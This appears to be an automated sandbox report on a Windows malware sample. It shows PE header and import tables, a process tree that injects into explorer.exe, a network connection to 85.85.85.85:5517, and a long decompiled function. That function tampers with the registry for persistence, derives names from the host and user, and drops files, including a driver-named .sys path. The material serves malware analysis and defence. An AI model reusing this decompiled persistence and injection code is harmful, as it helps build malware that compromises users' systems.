                                • [C++] VS98 (6.0) SP6 build 8804
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x21040x64.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x250000x2c4.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000xf4.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x83c0xa00False0.6125data5.695608564147735IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rdata0x20000x5c60x600False0.515625data4.859194046971246IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .data0x30000x220000x200False0.130859375Matlab v4 mat-file (little endian) e, numeric, rows 0, columns 00.545273764156015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x250000x140000x13400False0.9915533685064936data7.990480623641147IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                NameRVASizeTypeLanguageCountry
                                RT_MANIFEST0x250580x148XML 1.0 document, ASCII text, with very long lines (328), with no line terminatorsEnglishUnited States
                                DLLImport
                                KERNEL32.dllResumeThread, WriteProcessMemory, VirtualProtectEx, GetModuleFileNameW, DuplicateHandle, GetCurrentProcess, SetFileTime, CopyFileW, GetDriveTypeW, GetFileTime, CreateFileW, SetErrorMode, GetTempFileNameW, GetTempPathW, ExitProcess, Sleep, DeleteFileW, CloseHandle, WaitForSingleObject, CreateProcessW, ReadProcessMemory, GetThreadSelectorEntry, GetThreadContext, GetLastError, lstrlenW, GetModuleHandleW, GetStartupInfoW
                                USER32.dllMessageBoxA
                                SHELL32.dllShellExecuteW
                                MSVCRT.dllmemset, wcscpy, free, _fileno, _chsize, wcsrchr, wcscat, malloc, fclose, fread, fwrite, fseek, _wfopen, sprintf, fflush, _exit, _XcptFilter, exit, _wcmdln, __wgetmainargs, _initterm, __setusermatherr, _adjust_fdiv, __p__commode, __p__fmode, __set_app_type, _except_handler3, _controlfp
                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States

                                Download Network PCAP: filteredfull

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 17, 2022 18:25:39.314019918 CEST608425517192.168.2.585.85.85.85

                                Click to jump to process

                                Click to jump to process

                                • File
                                • Registry
                                • Network

                                Click to dive into process behavior distribution

                                Target ID:0
                                Start time:18:25:35
                                Start date:17/10/2022
                                Path:C:\Users\user\Desktop\lzxbD4wR0g.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\lzxbD4wR0g.exe
                                Imagebase:0x400000
                                File size:2111255 bytes
                                MD5 hash:C890F96E19EE27909DF744B788477006
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low

                                Target ID:1
                                Start time:18:25:35
                                Start date:17/10/2022
                                Path:C:\Windows\SysWOW64\explorer.exe
                                Wow64 process (32bit):
                                Commandline:explorer.exe
                                Imagebase:
                                File size:3611360 bytes
                                MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:2
                                Start time:18:25:36
                                Start date:17/10/2022
                                Path:C:\Windows\System32\fontdrvhost.exe
                                Wow64 process (32bit):false
                                Commandline:fontdrvhost.exe
                                Imagebase:0x7ff754630000
                                File size:790304 bytes
                                MD5 hash:31113981180E69C2773BCADA4051738A
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Target ID:5
                                Start time:18:25:38
                                Start date:17/10/2022
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 832
                                Imagebase:0xaa0000
                                File size:434592 bytes
                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Executed Functions

                                C-Code - Quality: 52%
                                			E02213B60(void* __ecx, void* __eflags) {
                                				void* _v8;
                                				intOrPtr _v20;
                                				intOrPtr _v28;
                                				void _v539;
                                				char _v540;
                                				void _v1051;
                                				char _v1052;
                                				struct HINSTANCE__* _v1056;
                                				void* _v1060;
                                				void _v1319;
                                				char _v1320;
                                				signed int _v1324;
                                				signed int _v1328;
                                				struct HINSTANCE__* _v1332;
                                				long _v1336;
                                				void _v9527;
                                				char _v9528;
                                				signed int _v9532;
                                				signed int _v9536;
                                				signed int _v9540;
                                				signed int _v9544;
                                				void _v75079;
                                				char _v75080;
                                				signed int _v75084;
                                				CHAR* _t194;
                                				struct HINSTANCE__* _t195;
                                				struct HINSTANCE__* _t196;
                                				long _t197;
                                				long _t198;
                                				intOrPtr _t200;
                                				long _t203;
                                				long _t204;
                                				signed int _t217;
                                				void* _t219;
                                				CHAR* _t221;
                                				void* _t222;
                                				signed int _t226;
                                				signed int _t231;
                                				signed int _t234;
                                				long _t237;
                                				void* _t246;
                                				void* _t247;
                                				signed int _t252;
                                				signed int _t264;
                                				signed int _t277;
                                				intOrPtr _t278;
                                				CHAR* _t302;
                                				CHAR* _t320;
                                				CHAR* _t325;
                                				signed int _t329;
                                				CHAR* _t342;
                                				char* _t345;
                                				intOrPtr _t356;
                                				intOrPtr _t357;
                                				signed int _t372;
                                				char* _t380;
                                				char* _t381;
                                				char* _t382;
                                				char* _t386;
                                				char* _t387;
                                				CHAR* _t388;
                                				CHAR* _t390;
                                				char* _t392;
                                				char* _t393;
                                				char* _t396;
                                				intOrPtr _t401;
                                				CHAR* _t403;
                                				LPVOID* _t418;
                                				CHAR* _t443;
                                				CHAR* _t445;
                                				CHAR* _t447;
                                				void* _t462;
                                				intOrPtr _t463;
                                				intOrPtr _t464;
                                				void* _t467;
                                				void* _t468;
                                				void* _t469;
                                				void* _t470;
                                				void* _t471;
                                				void* _t472;
                                				void* _t473;
                                				void* _t475;
                                
                                				_push(0xffffffff);
                                				_push(0x2204048);
                                				_push(0x2218090);
                                				 *[fs:0x0] = _t463;
                                				_t464 = _t463 - 8;
                                				E02218060(0x12530, __ecx,  *[fs:0x0]);
                                				_push(_t329);
                                				_v28 = _t464;
                                				_v1320 = 0;
                                				memset( &_v1319, 0, 0x40 << 2);
                                				asm("stosb");
                                				_v1336 = 0;
                                				_v1324 = 0;
                                				_v1328 = 0;
                                				_v1060 = 0;
                                				_v1052 = 0;
                                				memset( &_v1051, 0, 0x7f << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v540 = 0;
                                				memset( &_v539, 0, 0x7f << 2);
                                				_t467 = _t464 + 0x24;
                                				asm("stosw");
                                				asm("stosb");
                                				_v8 = 0;
                                				E02212EBC();
                                				_t194 =  *0x21e1694; // 0x2202154
                                				_t195 = LoadLibraryA(_t194); // executed
                                				_v1332 = _t195;
                                				if(_v1332 != 0) {
                                					_t390 =  *0x21e1864; // 0x220278c
                                					 *0x22190c4 = GetProcAddress(_v1332, _t390);
                                					_t325 =  *0x21e1868; // 0x22027a0
                                					 *0x22190bc = GetProcAddress(_v1332, _t325);
                                					_t447 =  *0x21e186c; // 0x22027b0
                                					 *0x2219014 = GetProcAddress(_v1332, _t447);
                                				}
                                				_t342 =  *0x21e18c8; // 0x2202894
                                				_t196 = LoadLibraryA(_t342); // executed
                                				_v1056 = _t196;
                                				if(_v1056 != 0) {
                                					_t443 =  *0x21e18d8; // 0x22028d8
                                					 *0x2219070 = GetProcAddress(_v1056, _t443);
                                					_t388 =  *0x21e18d0; // 0x22028b0
                                					 *0x2219010 = GetProcAddress(_v1056, _t388);
                                					_t320 =  *0x21e18d4; // 0x22028c4
                                					 *0x22190a8 = GetProcAddress(_v1056, _t320);
                                					_t445 =  *0x21e18cc; // 0x22028a0
                                					 *0x22190b0 = GetProcAddress(_v1056, _t445);
                                				}
                                				_t392 =  *0x21e16a4; // 0x22021d4
                                				_t197 = RegOpenKeyExA(0x80000001, _t392, 0, 0xf003f,  &_v1060); // executed
                                				if(_t197 == 0) {
                                					_v1336 = 0;
                                					_t387 =  *0x21e16a0; // 0x22021c0
                                					RegSetValueExA(_v1060, _t387, 0, "true",  &_v1336, "true"); // executed
                                					RegCloseKey(_v1060); // executed
                                				}
                                				_t393 =  *0x21e16d4; // 0x22022ec
                                				_t198 = RegOpenKeyExA(0x80000002, _t393, 0, 0xf003f,  &_v1060); // executed
                                				if(_t198 == 0) {
                                					_v1336 = 0;
                                					_t386 =  *0x21e16d8; // 0x2202328
                                					RegSetValueExA(_v1060, _t386, 0, "true",  &_v1336, "true"); // executed
                                					RegCloseKey(_v1060);
                                				}
                                				_t345 =  *0x21e16e8; // 0x2202384
                                				 *0x21e1148( &_v540, _t345);
                                				_t200 =  *0x21e170c; // 0x220242c
                                				 *0x21e106c( &_v540, _t200);
                                				_t203 = RegOpenKeyExA(0x80000002,  &_v540, 0, 0xf003f,  &_v1060); // executed
                                				if(_t203 == 0) {
                                					GetModuleFileNameA(0,  &_v1052, 0x200);
                                					_t302 =  *0x21e16ec; // 0x22023e0
                                					wsprintfA( &_v540, _t302,  &_v1052);
                                					_t467 = _t467 + 0xc;
                                					RegSetValueExA(_v1060,  &_v1052, 0, 1,  &_v540,  *0x21e114c( &_v540));
                                					RegCloseKey(_v1060);
                                				}
                                				_t396 =  *0x21e16e8; // 0x2202384
                                				_t204 = RegOpenKeyExA(0x80000002, _t396, 0, 0xf003f,  &_v1060); // executed
                                				if(_t204 == 0) {
                                					_v1336 = 0;
                                					_t380 =  *0x21e1838; // 0x220274c
                                					RegSetValueExA(_v1060, _t380, 0, "true",  &_v1336, "true"); // executed
                                					_v1336 = 0;
                                					_t381 =  *0x21e183c; // 0x220275c
                                					RegSetValueExA(_v1060, _t381, 0, "true",  &_v1336, "true"); // executed
                                					_v1336 = 1;
                                					_t382 =  *0x21e1840; // 0x2202774
                                					RegSetValueExA(_v1060, _t382, 0, "true",  &_v1336, "true"); // executed
                                					RegCloseKey(_v1060); // executed
                                				}
                                				GetWindowsDirectoryA( &M022194E4, 0x104);
                                				_t60 =  *0x21e114c( &M022194E4) +  &M022194E3; // 0x5c3a436f
                                				if( *_t60 != 0x5c) {
                                					 *0x21e106c( &M022194E4, 0x2203e20);
                                				}
                                				_v1336 = 0x80;
                                				GetComputerNameA( &_v540,  &_v1336); // executed
                                				_push( &_v540);
                                				if( *0x21e114c() > 2) {
                                					_v9532 = _v540;
                                					_v9536 =  *((intOrPtr*)(_t462 +  *0x21e114c( &_v540) - 0x219));
                                					 *0x21e1674 = (_v9532 & 0x000000ff) * (_v9536 & 0x000000ff) + 0x424;
                                				}
                                				 *0x21e1148("Software\\Tebjlp", "Software\\");
                                				_v1336 = 0x80;
                                				_t350 =  &_v1336;
                                				GetUserNameA( &_v540,  &_v1336); // executed
                                				_push( &_v540);
                                				if( *0x21e114c() < 4) {
                                					_t350 =  *0x21e16e0; // 0x2202364
                                					 *0x21e1148( &_v540, _t350);
                                				}
                                				E0221772B("alfoC:\\Windows\\",  &_v540, "true");
                                				_t468 = _t467 + 0xc;
                                				_v1324 = 0;
                                				while(1) {
                                					_push( &_v540);
                                					if(_v1324 >=  *0x21e114c() || _v1324 >= 0x10) {
                                						break;
                                					}
                                					_v1336 =  *((char*)(_t462 + _v1324 - 0x218)) + (_v1324 ^ 0);
                                					if(_v1336 < 0) {
                                						_v1336 = _v1336 * 0xffffffff;
                                					}
                                					asm("sbb ebx, ebx");
                                					_t329 = (_t329 & 0x00000020) + 0x41 + _v1336 % 0x19;
                                					("Software\\Tebjlp")[ *0x21e114c("Software\\Tebjlp")] = _t329;
                                					_t350 =  &(_v1324->nLength);
                                					_v1324 =  &(_v1324->nLength);
                                				}
                                				_t217 = E02210B9A( &M022194E4); // executed
                                				_t469 = _t468 + 4;
                                				__eflags = _t217;
                                				if(_t217 != 0) {
                                					 *0x21e1148("C:\\Windows\\lvgdvj.log",  &M022194E4);
                                				} else {
                                					GetTempPathA(0xe4, "C:\\Windows\\lvgdvj.log");
                                					_t100 =  *0x21e114c("C:\\Windows\\lvgdvj.log") + 0x22196eb; // 0x5c3a4300
                                					__eflags =  *_t100 - 0x5c;
                                					if( *_t100 != 0x5c) {
                                						 *0x21e106c("C:\\Windows\\lvgdvj.log", "\\");
                                					}
                                					_t277 = E02210B9A("C:\\Windows\\lvgdvj.log");
                                					_t469 = _t469 + 4;
                                					__eflags = _t277;
                                					if(_t277 == 0) {
                                						_t278 =  *0x21e1684; // 0x2202100
                                						 *0x21e1148("C:\\Windows\\lvgdvj.log", _t278);
                                					}
                                				}
                                				_v1324 = 0;
                                				while(1) {
                                					_t219 =  *0x21e114c( &_v540);
                                					__eflags = _v1324 - _t219;
                                					if(_v1324 >= _t219) {
                                						break;
                                					}
                                					__eflags = _v1324 - 0x10;
                                					if(_v1324 < 0x10) {
                                						_v1336 =  *((char*)(_t462 + _v1324 - 0x218)) + (_v1324 ^ 0) * "alfoC:\\Windows\\";
                                						__eflags = _v1336;
                                						if(_v1336 < 0) {
                                							_t372 = _v1336 * 0xffffffff;
                                							__eflags = _t372;
                                							_v1336 = _t372;
                                						}
                                						("C:\\Windows\\lvgdvj.log")[ *0x21e114c("C:\\Windows\\lvgdvj.log")] = _v1336 % 0x19 + 0x61;
                                						_t350 =  &(_v1324->nLength);
                                						__eflags = _t350;
                                						_v1324 = _t350;
                                						continue;
                                					}
                                					break;
                                				}
                                				_t401 =  *0x21e17c4; // 0x220266c
                                				 *0x21e106c("C:\\Windows\\lvgdvj.log", _t401);
                                				_t221 =  *0x21e16e4; // 0x2202370
                                				_t222 = CreateFileMappingA(0xffffffff, 0, "true", 0, 0x15400, _t221); // executed
                                				 *0x22882c0 = _t222;
                                				E0220477F(); // executed
                                				E02206274(); // executed
                                				E02205760(1); // executed
                                				_t470 = _t469 + 4;
                                				_t226 = E02205C26();
                                				__eflags = _t226;
                                				if(_t226 != 0) {
                                					E02205760(0);
                                					_t471 = _t470 + 4;
                                				} else {
                                					_v9540 = 0;
                                					_v9544 = 0;
                                					_v75080 = 0;
                                					memset( &_v75079, 0, 0x3fff << 2);
                                					asm("stosw");
                                					asm("stosb");
                                					_t350 =  &_v75080;
                                					E0220C89A( &_v75080); // executed
                                					_t475 = _t470 + 0x10;
                                					_v1324 = 0;
                                					while(1) {
                                						__eflags = _v1324 - 0x1770;
                                						if(_v1324 >= 0x1770) {
                                							break;
                                						}
                                						_t264 = _v1324;
                                						_t350 =  *(_t462 + _t264 - 0x10bcc);
                                						_v9540 =  *(_t462 + _t264 - 0x10bcc);
                                						_v9544 =  *((intOrPtr*)(_t462 + _v1324 - 0x10bc8));
                                						__eflags = _v9540;
                                						if(_v9540 == 0) {
                                							L46:
                                						} else {
                                							_t350 = _v9544 & 0x0000ffff;
                                							__eflags = _v9544 & 0x0000ffff;
                                							if((_v9544 & 0x0000ffff) == 0) {
                                								goto L46;
                                							} else {
                                								E02205E86(_v9540, _v9544 & 0x0000ffff, 0x1036a29, 1);
                                								_t475 = _t475 + 0x10;
                                								_t418 =  &(_v1324->lpSecurityDescriptor);
                                								__eflags = _t418;
                                								_v1324 = _t418;
                                								continue;
                                							}
                                						}
                                						break;
                                					}
                                					E02205760(0); // executed
                                					_t471 = _t475 + 4;
                                				}
                                				E02208701(_t350);
                                				E02204D96(_t350, __eflags, 0x2287da0); // executed
                                				_t472 = _t471 + 4; // executed
                                				E022055BE(); // executed
                                				_t231 =  *0x21e114c("59814062956");
                                				__eflags = _t231;
                                				if(_t231 == 0) {
                                					E0220A553(); // executed
                                				}
                                				_v9528 = 0;
                                				memset( &_v9527, 0, 0x7ff << 2);
                                				_t473 = _t472 + 0xc;
                                				asm("stosw");
                                				asm("stosb");
                                				_t353 = "59814062956";
                                				__eflags = "59814062956" - 0x30;
                                				if("59814062956" < 0x30) {
                                					L54:
                                					_t234 = E022044CB(_t353);
                                					asm("cdq");
                                					_t147 = (_t234 & 0x0000ffff) % 0x3e8;
                                					__eflags = _t147;
                                					_push(_t147);
                                					_t237 = GetTickCount();
                                					_t403 =  *0x21e16c8; // 0x22022b4
                                					wsprintfA("59814062956", _t403, _t237);
                                					_t473 = _t473 + 0x10;
                                				} else {
                                					__eflags = "59814062956" - 0x39;
                                					if("59814062956" > 0x39) {
                                						goto L54;
                                					}
                                				}
                                				_v1324 = 0;
                                				while(1) {
                                					_t152 =  &(("59814062956")[_v1324]); // 0x31383935
                                					__eflags =  *_t152 - 0x30;
                                					if( *_t152 < 0x30) {
                                						break;
                                					}
                                					_t154 =  &(("59814062956")[_v1324]); // 0x31383935
                                					__eflags =  *_t154 - 0x39;
                                					if( *_t154 <= 0x39) {
                                						_t156 =  &(("59814062956")[_v1324]); // 0x31383935
                                						__eflags =  *_t156;
                                						if( *_t156 != 0) {
                                							_t158 =  &(("59814062956")[_v1324]); // 0x31383935
                                							_t160 =  &(("9814062956")[_v1324]); // 0x34313839
                                							_v1328 =  *_t158 +  *_t160 + 4;
                                							_t252 = _v1328;
                                							__eflags = _t252 % 0x61 - 0x1a;
                                							if(_t252 % 0x61 > 0x1a) {
                                								_v75084 = 0x6e;
                                							} else {
                                								_v75084 = _v1328;
                                							}
                                							wsprintfA(_t462 +  *0x21e114c( &_v9528, "%c", _v75084) - 0x2534);
                                							_t473 = _t473 + 0xc;
                                							_v1324 = _v1324 + 2;
                                							__eflags = _v1324 - 0xc;
                                							if(_v1324 != 0xc) {
                                								continue;
                                							} else {
                                							}
                                						}
                                					}
                                					break;
                                				}
                                				_t356 =  *0x21e16b4; // 0x220226c
                                				 *0x21e106c( &_v9528, _t356);
                                				GetSystemDirectoryA("C:\\Windows\\system32\\drivers\\rmhlrn.sys", 0x80);
                                				_t180 =  *0x21e114c("C:\\Windows\\system32\\drivers\\rmhlrn.sys") + 0x22882d7; // 0x5c3a4300
                                				__eflags =  *_t180 - 0x5c;
                                				if( *_t180 != 0x5c) {
                                					 *0x21e106c("C:\\Windows\\system32\\drivers\\rmhlrn.sys", "\\");
                                				}
                                				_t357 =  *0x21e16bc; // 0x2202288
                                				 *0x21e106c("C:\\Windows\\system32\\drivers\\rmhlrn.sys", _t357);
                                				 *0x21e106c("C:\\Windows\\system32\\drivers\\rmhlrn.sys",  &_v9528);
                                				_t246 = GlobalAlloc(0x40, 0x20000); // executed
                                				 *0x22190a4 = _t246;
                                				_t247 = GlobalAlloc(0x40, 0x20000); // executed
                                				 *0x2219004 = _t247;
                                				_v8 = 0xffffffff;
                                				 *[fs:0x0] = _v20;
                                				return _t247;
                                			}





















































































                                0x02213b63
                                0x02213b65
                                0x02213b6a
                                0x02213b76
                                0x02213b7d
                                0x02213b85
                                0x02213b8a
                                0x02213b8d
                                0x02213b90
                                0x02213ba4
                                0x02213ba6
                                0x02213ba7
                                0x02213bb1
                                0x02213bbb
                                0x02213bc5
                                0x02213bcf
                                0x02213be3
                                0x02213be5
                                0x02213be7
                                0x02213be8
                                0x02213bfc
                                0x02213bfc
                                0x02213bfe
                                0x02213c00
                                0x02213c01
                                0x02213c08
                                0x02213c0d
                                0x02213c13
                                0x02213c19
                                0x02213c26
                                0x02213c28
                                0x02213c3c
                                0x02213c41
                                0x02213c54
                                0x02213c59
                                0x02213c6d
                                0x02213c6d
                                0x02213c72
                                0x02213c79
                                0x02213c7f
                                0x02213c8c
                                0x02213c8e
                                0x02213ca2
                                0x02213ca7
                                0x02213cbb
                                0x02213cc0
                                0x02213cd3
                                0x02213cd8
                                0x02213cec
                                0x02213cec
                                0x02213cff
                                0x02213d0b
                                0x02213d13
                                0x02213d15
                                0x02213d2c
                                0x02213d3a
                                0x02213d47
                                0x02213d47
                                0x02213d5b
                                0x02213d67
                                0x02213d6f
                                0x02213d71
                                0x02213d88
                                0x02213d96
                                0x02213da3
                                0x02213da3
                                0x02213da9
                                0x02213db7
                                0x02213dbd
                                0x02213dca
                                0x02213dea
                                0x02213df2
                                0x02213e02
                                0x02213e0f
                                0x02213e1c
                                0x02213e22
                                0x02213e4c
                                0x02213e59
                                0x02213e59
                                0x02213e6d
                                0x02213e79
                                0x02213e81
                                0x02213e87
                                0x02213e9e
                                0x02213eac
                                0x02213eb2
                                0x02213ec9
                                0x02213ed7
                                0x02213edd
                                0x02213ef4
                                0x02213f02
                                0x02213f0f
                                0x02213f0f
                                0x02213f1f
                                0x02213f30
                                0x02213f3a
                                0x02213f46
                                0x02213f46
                                0x02213f4c
                                0x02213f64
                                0x02213f70
                                0x02213f7a
                                0x02213f82
                                0x02213f9c
                                0x02213fc2
                                0x02213fc2
                                0x02213fd3
                                0x02213fd9
                                0x02213fe3
                                0x02213ff1
                                0x02213ffd
                                0x02214007
                                0x02214009
                                0x02214017
                                0x02214017
                                0x0221402b
                                0x02214030
                                0x02214033
                                0x0221404e
                                0x02214054
                                0x02214061
                                0x00000000
                                0x00000000
                                0x0221408c
                                0x02214099
                                0x022140a4
                                0x022140a4
                                0x022140b2
                                0x022140c9
                                0x022140d6
                                0x02214045
                                0x02214048
                                0x02214048
                                0x022140e6
                                0x022140eb
                                0x022140ee
                                0x022140f0
                                0x02214157
                                0x022140f2
                                0x022140fc
                                0x0221410d
                                0x02214114
                                0x02214117
                                0x02214123
                                0x02214123
                                0x0221412e
                                0x02214133
                                0x02214136
                                0x02214138
                                0x0221413a
                                0x02214145
                                0x02214145
                                0x0221414b
                                0x0221415d
                                0x02214178
                                0x0221417f
                                0x02214185
                                0x0221418b
                                0x00000000
                                0x00000000
                                0x0221418d
                                0x02214194
                                0x022141bd
                                0x022141c3
                                0x022141ca
                                0x022141d2
                                0x022141d2
                                0x022141d5
                                0x022141d5
                                0x022141fa
                                0x0221416f
                                0x0221416f
                                0x02214172
                                0x00000000
                                0x02214172
                                0x00000000
                                0x02214194
                                0x02214205
                                0x02214211
                                0x02214217
                                0x0221422a
                                0x02214230
                                0x02214235
                                0x0221423a
                                0x02214241
                                0x02214246
                                0x02214249
                                0x0221424e
                                0x02214250
                                0x02214333
                                0x02214338
                                0x02214256
                                0x02214256
                                0x02214260
                                0x02214269
                                0x0221427d
                                0x0221427f
                                0x02214281
                                0x02214282
                                0x02214289
                                0x0221428e
                                0x02214291
                                0x022142ac
                                0x022142ac
                                0x022142b6
                                0x00000000
                                0x00000000
                                0x022142b8
                                0x022142be
                                0x022142c5
                                0x022142d9
                                0x022142e0
                                0x022142e7
                                0x0221431e
                                0x022142e9
                                0x022142ef
                                0x022142f5
                                0x022142f7
                                0x00000000
                                0x022142f9
                                0x02214314
                                0x02214319
                                0x022142a3
                                0x022142a3
                                0x022142a6
                                0x00000000
                                0x022142a6
                                0x022142f7
                                0x00000000
                                0x022142e7
                                0x02214327
                                0x0221432c
                                0x0221432c
                                0x0221433b
                                0x02214345
                                0x0221434a
                                0x0221434d
                                0x02214357
                                0x0221435d
                                0x0221435f
                                0x02214361
                                0x02214361
                                0x02214366
                                0x0221437a
                                0x0221437a
                                0x0221437c
                                0x0221437e
                                0x0221437f
                                0x02214386
                                0x02214389
                                0x02214397
                                0x02214397
                                0x022143a1
                                0x022143a7
                                0x022143a7
                                0x022143a9
                                0x022143aa
                                0x022143b1
                                0x022143bd
                                0x022143c3
                                0x0221438b
                                0x02214392
                                0x02214395
                                0x00000000
                                0x00000000
                                0x02214395
                                0x022143c6
                                0x022143d0
                                0x022143d6
                                0x022143dd
                                0x022143e0
                                0x00000000
                                0x00000000
                                0x022143ec
                                0x022143f3
                                0x022143f6
                                0x02214402
                                0x02214409
                                0x0221440b
                                0x02214417
                                0x02214424
                                0x0221442f
                                0x02214435
                                0x02214444
                                0x02214447
                                0x02214457
                                0x02214449
                                0x0221444f
                                0x0221444f
                                0x02214482
                                0x02214488
                                0x02214494
                                0x0221449a
                                0x022144a1
                                0x00000000
                                0x00000000
                                0x022144a3
                                0x022144a1
                                0x0221440b
                                0x00000000
                                0x022143f6
                                0x022144aa
                                0x022144b8
                                0x022144c8
                                0x022144d9
                                0x022144e0
                                0x022144e3
                                0x022144ef
                                0x022144ef
                                0x022144f5
                                0x02214501
                                0x02214513
                                0x02214520
                                0x02214526
                                0x02214532
                                0x02214538
                                0x0221453d
                                0x02214559
                                0x02214566

                                APIs
                                  • Part of subcall function 02212EBC: RegOpenKeyExA.KERNELBASE(80000001,0220244C,00000000,000F003F,?,?), ref: 02212F03
                                  • Part of subcall function 02212EBC: RegSetValueExA.KERNELBASE(?,02202488,00000000,?,00000002,?), ref: 02212F31
                                  • Part of subcall function 02212EBC: RegCloseKey.KERNELBASE(?), ref: 02212F3E
                                  • Part of subcall function 02212EBC: lstrcpy.KERNEL32(00000000,02202550), ref: 02212F99
                                  • Part of subcall function 02212EBC: lstrcat.KERNEL32(00000000,02202548), ref: 02212FAC
                                • LoadLibraryA.KERNELBASE(02202154), ref: 02213C13
                                • GetProcAddress.KERNEL32(00000000,0220278C), ref: 02213C36
                                • GetProcAddress.KERNEL32(00000000,022027A0), ref: 02213C4E
                                • GetProcAddress.KERNEL32(00000000,022027B0), ref: 02213C67
                                • LoadLibraryA.KERNELBASE(02202894), ref: 02213C79
                                • GetProcAddress.KERNEL32(00000000,022028D8), ref: 02213C9C
                                • GetProcAddress.KERNEL32(00000000,022028B0), ref: 02213CB5
                                • GetProcAddress.KERNEL32(00000000,022028C4), ref: 02213CCD
                                • GetProcAddress.KERNEL32(00000000,022028A0), ref: 02213CE6
                                • RegOpenKeyExA.KERNELBASE(80000001,022021D4,00000000,000F003F,00000000), ref: 02213D0B
                                • RegSetValueExA.KERNELBASE(00000000,022021C0,00000000,?,00000000,?), ref: 02213D3A
                                • RegCloseKey.KERNELBASE(00000000), ref: 02213D47
                                • RegOpenKeyExA.KERNELBASE(80000002,022022EC,00000000,000F003F,00000000), ref: 02213D67
                                • RegSetValueExA.KERNELBASE(00000000,02202328,00000000,?,00000000,?), ref: 02213D96
                                • RegCloseKey.ADVAPI32(00000000), ref: 02213DA3
                                • lstrcpy.KERNEL32(00000000,02202384), ref: 02213DB7
                                • lstrcat.KERNEL32(00000000,0220242C), ref: 02213DCA
                                • RegOpenKeyExA.KERNELBASE(80000002,00000000,00000000,000F003F,00000000), ref: 02213DEA
                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000200), ref: 02213E02
                                • wsprintfA.USER32 ref: 02213E1C
                                • lstrlen.KERNEL32(?), ref: 02213E2C
                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 02213E4C
                                • RegCloseKey.ADVAPI32(?), ref: 02213E59
                                • RegOpenKeyExA.KERNELBASE(80000002,02202384,00000000,000F003F,00000000), ref: 02213E79
                                • RegSetValueExA.KERNELBASE(00000000,0220274C,00000000,?,00000000,?), ref: 02213EAC
                                • RegSetValueExA.KERNELBASE(00000000,0220275C,00000000,?,00000000,?), ref: 02213ED7
                                • RegSetValueExA.KERNELBASE(00000000,02202774,00000000,?,00000001,?), ref: 02213F02
                                • RegCloseKey.KERNELBASE(00000000), ref: 02213F0F
                                  • Part of subcall function 02210B9A: lstrcpy.KERNEL32(?,?), ref: 02210BC8
                                  • Part of subcall function 02210B9A: GetTickCount.KERNEL32 ref: 02210BCE
                                  • Part of subcall function 02210B9A: lstrlen.KERNEL32(?,02203D08,00000000), ref: 02210BE1
                                  • Part of subcall function 02210B9A: wsprintfA.USER32 ref: 02210BEF
                                  • Part of subcall function 02210B9A: CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 02210C0E
                                  • Part of subcall function 02210B9A: FindCloseChangeNotification.KERNELBASE(?), ref: 02210C2A
                                  • Part of subcall function 02210B9A: DeleteFileA.KERNELBASE(?), ref: 02210C37
                                • GetWindowsDirectoryA.KERNEL32(C:\Windows\,00000104), ref: 02213F1F
                                • lstrlen.KERNEL32(C:\Windows\), ref: 02213F2A
                                • lstrcat.KERNEL32(C:\Windows\,02203E20), ref: 02213F46
                                • GetComputerNameA.KERNEL32(00000000,00000080), ref: 02213F64
                                • lstrlen.KERNEL32(00000000), ref: 02213F71
                                • lstrlen.KERNEL32(00000000), ref: 02213F8F
                                • lstrcpy.KERNEL32(Software\Tebjlp,Software\), ref: 02213FD3
                                • GetUserNameA.ADVAPI32(00000000,00000080), ref: 02213FF1
                                • lstrlen.KERNEL32(00000000), ref: 02213FFE
                                • lstrcpy.KERNEL32(00000000,02202364), ref: 02214017
                                • lstrlen.KERNEL32(?), ref: 02214055
                                • lstrlen.KERNEL32(Software\Tebjlp), ref: 022140D0
